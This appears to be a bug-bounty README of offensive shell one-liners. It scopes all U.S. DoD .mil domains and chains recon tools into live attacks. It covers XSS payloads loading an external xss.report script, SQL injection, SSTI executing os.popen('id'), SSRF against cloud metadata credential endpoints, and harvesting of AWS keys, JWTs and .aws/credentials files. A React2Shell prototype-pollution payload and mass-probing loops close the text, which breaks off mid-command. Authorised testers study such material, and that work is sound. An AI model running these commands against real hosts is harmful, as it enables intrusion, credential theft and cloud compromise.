β β β β β β β β β β β β β β β£β£β£β£β£β£β£β£β β β β β β β β β β β β β β β β β β β β β β β β 53C β£β£΄β£Ύβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£·β£¦β£β β β β β β β β β β β β β β β β β β β£ β£Ύβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£·β£β β β β β β β β β β β β β β β’β£Ύβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘Ώβ β β β β β β β β’Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£·β‘β β β β β β β β β β β β’ β£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ β β β β β β β β β β β Ήβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘β β β β β β β β β β β£Ύβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘Ώβ β β’β£€β£€β‘β β’β£€β£€β‘β β’Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£·β β β β β β β β β β’°β£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘β β β β£Ώβ£Ώβ‘β β’Έβ£Ώβ£Ώβ β β’Έβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘β β β β β β β β Ⓒ⣿⣿⣿⣿⣿⣿⣧β β β β β β β β β β β β β£Όβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘β β β β β β β β β β£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£·β£€β£€β£€β£€β£€β£€β£€β£€β£€β£€β£Ύβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ β β β β β β β β β β’»β£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘β β β β β β β β β β β β »β£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ β β β β β β β β β β β β β β β »β’Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘Ώβ β β β β β β β β β β β β β β β β β β β β β »β Ώβ’Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ£Ώβ‘Ώβ Ώβ β β β β β β β β β β β β
"In the shadows we hunt, in the code we trust" π΄ββ οΈ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "The quieter you become, the more you are able to hear" - Kali β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
 π‘οΈ DoD Department of Defense |
 β Army U.S. Army |
β Navy U.S. Navy |
 U.S. Air Force |
 π¦ Marines U.S. Marines |
 π Space Force U.S. Space Force |
π Full DoD Scope - 19 Domains (Click to expand)
# π― BBRF Scope - All DoD Domains (Copy & Paste Ready)
bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'| ποΈ Military Branches | ποΈ DoD Agencies | π§ Support Commands |
|---|---|---|
*.af.mil - Air Force*.army.mil - Army*.marines.mil - Marines*.navy.mil - Navy*.spaceforce.mil - Space Force*.ussf.mil - Space Force
|
*.pentagon.mil - Pentagon HQ*.osd.mil - Office of SecDef*.disa.mil - Defense Info Systems*.dtra.mil - Threat Reduction*.dla.mil - Logistics Agency*.dcma.mil - Contract Management
|
*.dtic.mil - Tech Info Center*.dau.mil - Acquisition Univ*.health.mil - Military Health*.ng.mil - National Guard*.uscg.mil - Coast Guard*.socom.mil - Special Operations*.dds.mil - Digital Service*.yellowribbon.mil - Yellow Ribbon
|
Click to expand navigation
| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2024-2025 | Latest techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |
Our main goal is to share tips from well-known bug hunters. Using recon methodology, we find subdomains, APIs, and tokens that are exploitable. We aim to influence the community with Oneliner tips for better understanding.
- 400+ Curated Oneliners - Battle-tested commands from real bug bounty hunters
- Complete Methodology - From recon to exploitation
- Constantly Updated - New techniques added regularly
- Community Driven - Contributions from top hunters worldwide
Download BugBuntu:
Get your first recon running in under 5 minutes:
# 1. Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# 2. Run your first recon
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high
# 3. Profit! πClick to expand complete tool list
| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
#!/bin/bash
# One-click install for all Go tools
tools=(
"github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
"github.com/projectdiscovery/httpx/cmd/httpx@latest"
"github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
"github.com/projectdiscovery/katana/cmd/katana@latest"
"github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
"github.com/lc/gau/v2/cmd/gau@latest"
"github.com/tomnomnom/waybackurls@latest"
"github.com/tomnomnom/anew@latest"
"github.com/tomnomnom/qsreplace@latest"
"github.com/tomnomnom/unfurl@latest"
"github.com/tomnomnom/gf@latest"
"github.com/hahwul/dalfox/v2@latest"
"github.com/ffuf/ffuf/v2@latest"
"github.com/jaeles-project/gospider@latest"
"github.com/hakluke/hakrawler@latest"
)
for tool in "${tools[@]}"; do
echo "[+] Installing $tool"
go install -v "$tool"
done
echo "[β] All tools installed!"# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'βββββββββββ ββββββββββ βββββββ βββββββ ββββ ββββ ββββββ βββββββ βββ
βββββββββββ βββββββββββββββββββββββββββββββββ βββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββ βββ ββββββ βββββββββ ββββββ
ββββββββ βββββββ βββββββ βββββββ βββββββ βββ ββββββ βββββββββ βββββ
β οΈ ENUMERATE EVERYTHING β οΈ
# β οΈ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt# β οΈ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent# β οΈ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high# β οΈ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anewsubfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt# β οΈ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt
# β οΈ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt
# β οΈ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt
# β οΈ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -
53C
u | anew subs.txt
# β οΈ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txtgithub-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt# β οΈ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt# β οΈ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt# β οΈ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt# β οΈ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt# β οΈ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt# β οΈ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt# β οΈ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt# β οΈ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt# β οΈ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt# β οΈ THE ULTIMATE SUBDOMAIN HUNTER β οΈ
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt# β οΈ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt# β οΈ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt# β οΈ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt# β οΈ Find related hosts via favicon hash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt# β οΈ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.comsubfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txtcat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txtcat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txtcat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txtcat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -ucat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -ucat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -ucat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16})" | sort -u | anew aws_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\\-_]{35}" | sort -u | anew google_api_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebaseapp\.com" | sort -u | anew firebase_urls.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}[^\"' ]*|https?://[a-zA-Z0-9-]+\.(internal|local|corp|lan|intra)[^\"' ]*" | sort -u | anew internal_hosts.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txtcat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/[A-Za-z0-9/]+|https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew webhooks.txtπ Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txtcat urls.txt | gf xss | uro | qsreplace '"><svg class="pl-pds">' | dalfox pipe --silence --skip-bavcat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silentecho target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg class="pl-pds">' | airixss -payload "confirm(1)"cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txtcat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */ )//" | httpx -silent -mr "alert"cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txtcat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txtcat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txtcat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txtcat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silentcat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txtcat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silentcat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silentcat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silentkatana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txtgospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anewecho https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txtparamspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txtwaymore -i target.com -mode U -oU urls.txtkatana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txtkatana -u https://target.com -f qurl -silent | grep "?" | anew forms.txtX8 Hidden Parameters
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txtarjun -i urls.txt -oT arjun_params.txt --stablecat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -accat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -ucat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txtcat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txtcat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txtcat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txtcat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txtcat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txtnuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txtnuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txtsubfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txtnuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txtnuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txtnuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txtnuclei -l ips.txt -t network/ -c 25 -o network_vulns.txtcat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txtcat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txtcat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txtfor i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -ccat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txtcat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txtcat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txtcat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txtcat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain
# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt
# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt
# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt
# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt
# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x class="pl-pds">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api
# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt
# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt
# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt
echo "[+] API recon complete!"Add to your .bashrc or .zshrc:
# Quick recon
recon() {
subfinder -d $1 -silent | anew subs.txt
assetfinder -subs-only $1 | anew subs.txt
cat subs.txt | httpx -silent | anew alive.txt
echo "[+] Found $(wc -l < alive.txt) alive hosts"
}
# XSS scan
xscan() {
echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg class="pl-pds">' | airixss -payload "confirm(1)"
}
# SQLi scan
sqscan() {
echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}
# JS recon
jsrecon() {
echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}
# Nuclei quick
nuke() {
echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}
# Full pipeline
fullrecon() {
recon $1
cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}
# Certificate search
cert() {
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
# Parameter extraction
params() {
echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}
# Subdomain takeover check
takeover() {
subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}
# Port scan
portscan() {
naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}
# Screenshot all
screenshot() {
cat $1 | xargs -I@ gowitness single @ -o screenshots/
}π Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV π
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txtcurl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txtcurl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txtcat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txtshodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txtnuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txtsubfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txtcurl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500cat urls.txt | parallel 